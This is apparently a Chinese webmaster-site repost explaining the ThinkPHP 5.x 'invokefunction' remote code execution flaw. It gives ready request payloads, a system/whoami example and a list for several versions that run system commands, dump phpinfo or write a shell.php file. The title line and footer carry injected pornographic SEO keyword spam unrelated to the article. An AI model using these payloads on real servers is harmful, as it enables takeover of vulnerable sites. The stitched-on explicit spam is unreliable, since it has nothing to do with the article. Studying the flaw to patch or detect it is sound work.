青草久久影院-青草久久伊人-青草久久久-青草久久精品亚洲综合专区-SM双性精跪趴灌憋尿调教H-SM脚奴调教丨踩踏贱奴

17站長網(wǎng)

17站長網(wǎng) 首頁 安全 腳本攻防 查看內(nèi)容

thinkphp代碼執(zhí)行g(shù)etshell的漏洞解決

2022-9-27 10:03| 查看: 2752 |來源: 互聯(lián)網(wǎng)

先來簡單說說前天thinkphp官方修復(fù)的一個getshell漏洞,框架對控制器沒有進行足夠的檢測導(dǎo)致的一處getshell 影響的范圍: 5.x < 5.1.31, <= 5.0.23 漏洞危害: 導(dǎo)致系統(tǒng)被提權(quán)(你懂的) 這里附上一個自己測試的

先來簡單說說前天thinkphp官方修復(fù)的一個getshell漏洞,框架對控制器沒有進行足夠的檢測導(dǎo)致的一處getshell

影響的范圍: 5.x < 5.1.31, <= 5.0.23

漏洞危害: 導(dǎo)致系統(tǒng)被提權(quán)(你懂的)

這里附上一個自己測試的 thinkphp的 鏈接  http://www.thinkphp.cn/download/1260.html  版本是5.0.22

先來講下,5.0 跟5.1的區(qū)別吧,tp5.1中引入了容器(Container)和門面(Facade)這兩個新的類  tp5.0是沒有這兩個新的類的,

漏洞原理

URL:http://192.168.188.141/public/index.php?s=index/\think\app/invokefunction

我們先來看看App類里的 exec函數(shù)里的執(zhí)行分層控制器的操作

我們這里是把controller 的調(diào)用信息跟配置信息全部傳到了 invokeFunction 這個 執(zhí)行函數(shù)里面去了

因為think\App是第二個入口,在tp運行的時候就會被加載 所以用think\App里面的分層控制器的執(zhí)行操作的時候,需要去調(diào)用invokeFunction這個函數(shù)。

這個函數(shù)有兩個參數(shù),如上圖所示,第一個是函數(shù)的名字,第二個參數(shù)數(shù)組,比如$function傳入BaiDu然后$vars傳入[12,555]就相當(dāng)于調(diào)用BaiDu(12,555)

此處我們把function傳入call_user_func_array然后vars[0]傳入我們要執(zhí)行的函數(shù)的名字vars[1]傳入要執(zhí)行函數(shù)的參數(shù),因為vars是個數(shù)組 所以此處我們的get請求需要這樣寫

[code] vars[]=函數(shù)名&vars[1][]=參數(shù)[/code]

此處是利用php的數(shù)組注入

此時此刻就可以開始利用遠程代碼執(zhí)行漏洞了 比如我們要執(zhí)行system函數(shù) 他的參數(shù)是whoami

http://192.168.188.141/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

下面你懂的,作為一個接班人我們要做的就是修復(fù)他(為所欲為?),當(dāng)然官方更新的最新版本是已經(jīng)修復(fù)了的

這里就代碼執(zhí)行成功,以下奉獻上tp不同版本的payload

[code] ?s=index/\think\Request/input&filter=phpinfo&data=1 ?s=index/\think\Request/input&filter=system&data=id ?s=index/\think\template\driver\file/write&cacheFile=shell.php&content= ?s=index/\think\view\driver\Php/display&content= ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id ?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 ?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id[/code]

以上就是本文的全部內(nèi)容,希望對大家的學(xué)習(xí)有所幫助,也希望大家多多支持17站長網(wǎng)。

本文最后更新于 2022-9-27 10:03,某些文章具有時效性,若有錯誤或已失效,請在網(wǎng)站留言或聯(lián)系站長:17tui@17tui.com
·END·
站長網(wǎng)微信號:w17tui,關(guān)注站長、創(chuàng)業(yè)、關(guān)注互聯(lián)網(wǎng)人 - 互聯(lián)網(wǎng)創(chuàng)業(yè)者營銷服務(wù)中心

免責(zé)聲明:本站部分文章和圖片均來自用戶投稿和網(wǎng)絡(luò)收集,旨在傳播知識,文章和圖片版權(quán)歸原作者及原出處所有,僅供學(xué)習(xí)與參考,請勿用于商業(yè)用途,如果損害了您的權(quán)利,請聯(lián)系我們及時修正或刪除。謝謝!

17站長網(wǎng)微信二維碼

始終以前瞻性的眼光聚焦站長、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長轉(zhuǎn)型升級,為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營銷服務(wù),與站長一起進步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨!

掃一掃,關(guān)注站長網(wǎng)微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        主站蜘蛛池模板: qvod 在线 | 欧美不卡一区二区三区 | 国产激情精品久久久久久碰 | 夜色伊甸园 | 日本久久中文字幕精品 | 亚洲精品白色在线发布 | 欧美日韩午夜群交多人轮换 | 亚洲AV无码乱码A片无码蜜桃 | 伧理片午夜伧理片 | 久草热在线| 拍床戏被肉高H纯肉H在水 | 99re.05久久热最新地址 | 18禁止观看免费私人影院 | 成人啪啪色婷婷久色社区 | 99视频在线观看视频 | 最近更新2019中文字幕国语 | 人妻夜夜爽99麻豆AV | 成人国产亚洲精品A区天堂蜜臀 | 我半夜摸妺妺的奶C了她软件 | 亚洲 天堂 欧美 日韩 国产 | 99在线观看免费视频 | 久久综合中文字幕佐佐木希 | 伊人久久大香线蕉avapp下载 | 97久久国产露脸精品国产 | 香蕉鱼视频观看在线视频下载 | 精品无码久久久久久国产百度 | 亚洲欧美偷拍视频一区 | 在线涩涩免费观看国产精品 | 久久成人a毛片免费观看网站 | 老湿机一区午夜精品免费福利 | 十分钟免费视频大全在线 | 国产精品JIZZ在线观看A片 | 97在线国内自拍视频 | 欲乱艳荡少寡妇全文免费 | 高清国产mv视频在线观看 | 亚洲AV久久无码精品九号软件 | 天天躁日日躁狠狠躁午夜剧场 | 赤兔CHINESE最新男18GUY | 日韩欧美一区二区中文字幕 | 99久久久无码国产精精品 | 免费果冻传媒2021视频 |